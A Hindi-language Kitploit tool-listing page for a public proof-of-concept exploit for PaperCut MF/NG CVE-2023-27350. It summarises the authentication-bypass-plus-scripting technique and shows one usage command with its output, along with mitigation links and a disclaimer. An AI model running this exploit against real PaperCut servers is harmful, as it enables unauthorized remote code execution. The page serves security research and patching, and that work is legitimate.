Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27350 — Proof of Concept Exploit for PaperCut CVE-2023-27350 | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2023-27350
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubhorizon3ai/cve-2023-27350

CVE-2023-27350

Proof of Concept Exploit for PaperCut CVE-2023-27350

रिपॉजिटरी देखें
55243 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27350

PaperCut MF/NG पर प्रभाव डालने वाले CVE-2023-27350 के लिए POC

तकनीकी विश्लेषण

भेद्यता का तकनीकी मूल कारण विश्लेषण, समझौता संकेतक और इंटरनेट एक्सपोजर हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise

सारांश

यह POC एक प्रमाणीकरण बाईपास भेद्यता का उपयोग करता है जिसे कोड निष्पादित करने के लिए अंतर्निहित स्क्रिप्टिंग कार्यक्षमता के दुरुपयोग के साथ जोड़ा गया है।

उपयोग

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

शमन उपाय

नवीनतम संस्करण में अपडेट करें या PaperCut सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

नवीनतम सुरक्षा अनुसंधान के लिए Twitter पर Horizon3.ai Attack Team को फ़ॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग स्पष्ट रूप से अधिकृत प्रणालियों को छोड़कर अन्य पर आक्रमण करने के लिए नहीं किया जाना चाहिए। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें